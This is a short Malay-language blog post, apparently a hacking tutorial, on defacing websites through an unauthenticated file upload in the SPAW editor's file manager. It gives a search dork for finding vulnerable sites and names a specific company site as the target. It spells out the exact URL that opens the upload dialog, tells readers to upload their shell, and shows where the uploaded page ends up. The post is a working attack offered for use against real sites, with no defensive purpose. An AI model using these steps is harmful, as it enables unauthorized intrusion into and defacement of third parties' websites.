Deface Website With Spaw Upload Vuln..!!
Salam semua..Hari ni FCT nak share satu tutor deface wesite dengan mencari vuln SPAW Upload..kaedah ny maybe dah lama..tapi FCT nak share juga dengan korang yang mana belum tahu lagi kan...ok first kita cari duluw vuln Spaw upload..ok..gunakan dork ni untuk mencari target kita..
Code:'inurl:spaw2/uploads/files/'
ok..target kita mesti kelihatan macam ni url nya..
url:'http://punjlloyd.com/admin/spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files/'
lepas tu korang edit url ny:'spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files/'
menjadi macam ni:'spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files'
Jadi url korang akan jadi camni..
url:'http://punjlloyd.com/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files'
Tutor Deface Website With Spaw Upload Vuln
Ok sekarang korang refresh,dan nanti akan kuar page camni..
Ok..Tunggu apa lagi..korang upload la shell korang..
dan link yang korang upload tadi akan jadi camni..
url:'http://punjlloyd.com/admin/spaw2/uploads/files/namafilekorang.html'
ok..Done..!!
Selamat mecuba..:)



0 comments:
Post a Comment